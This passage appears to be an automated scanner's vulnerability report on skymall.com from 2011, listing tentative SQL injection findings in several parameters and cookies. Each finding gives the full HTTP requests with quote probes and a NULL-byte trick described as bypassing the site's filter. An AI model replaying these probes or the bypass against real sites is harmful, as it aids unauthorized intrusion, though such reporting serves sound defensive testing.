GET /adj/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y%2527%2527

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:46 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 22 Apr 2011 15:51:46 GMT
Expires: Fri, 22 Apr 2011 15:51:46 GMT
Cache-Control: private
Content-Length: 4614

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235259_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...

1.3. http://www.skymall.com/shopping/cart.htm [hiddenlong parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/cart.htm

Issue detail

The hiddenlong parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hiddenlong parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668%00'&pid=203459330&sbs_cm_sp=&sbs=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 19:52:21 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668%00''&pid=203459330&sbs_cm_sp=&sbs=

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 19:52:22 GMT
Connection: close
Set-Cookie: JSESSIONID=19B956766103588EFB68597AFA02EB9B.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:52:21 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:52:21 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:52:22 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:52:22 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303501941437~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 19:52:22 GMT
Set-Cookie: ol0=pid_203459330_qty_1; Expires=Fri, 06-May-2011 19:52:22 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 19:52:22 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 19:52:22 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 19:52:22 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 19:52:22 GMT
Content-Length: 148384


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

...[SNIP]...

1.4. http://www.skymall.com/shopping/cart.htm [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/cart.htm

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330%00'&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 19:20:43 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330%00''&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 19:20:45 GMT
Connection: close
Set-Cookie: JSESSIONID=358774B5A848AA808F590D4F5481AD01.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:20:43 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:20:43 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:20:45 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:20:45 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303500043274~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 19:20:45 GMT
Set-Cookie: ol0=pid_203459330_qty_1; Expires=Fri, 06-May-2011 19:20:45 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 19:20:45 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 19:20:45 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 19:20:45 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 19:20:45 GMT
Content-Length: 148384


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

...[SNIP]...

1.5. http://www.skymall.com/shopping/cart.htm [sbs parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/cart.htm

Issue detail

The sbs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sbs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs=' HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 19:12:02 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs='' HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 19:12:02 GMT
Connection: close
Set-Cookie: JSESSIONID=76AA45F5149BFA2FFC1715B0F9F4C7B1.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303499522593~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 19:12:02 GMT
Set-Cookie: ol0=pid_203459330_qty_1; Expires=Fri, 06-May-2011 19:12:02 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 19:12:02 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 19:12:02 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 19:12:02 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 19:12:02 GMT
Content-Length: 148385


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

...[SNIP]...

1.6. http://www.skymall.com/shopping/dept.htm [CoreID6 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The CoreID6 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CoreID6 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274'; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:35 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274''; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:35 GMT
Connection: close
Set-Cookie: JSESSIONID=44C84BD324C2F7E5B3C5A3F1F5F632D4.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497635469~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:35 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.7. http://www.skymall.com/shopping/dept.htm [TXNSESSION cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The TXNSESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TXNSESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^'; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:20 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
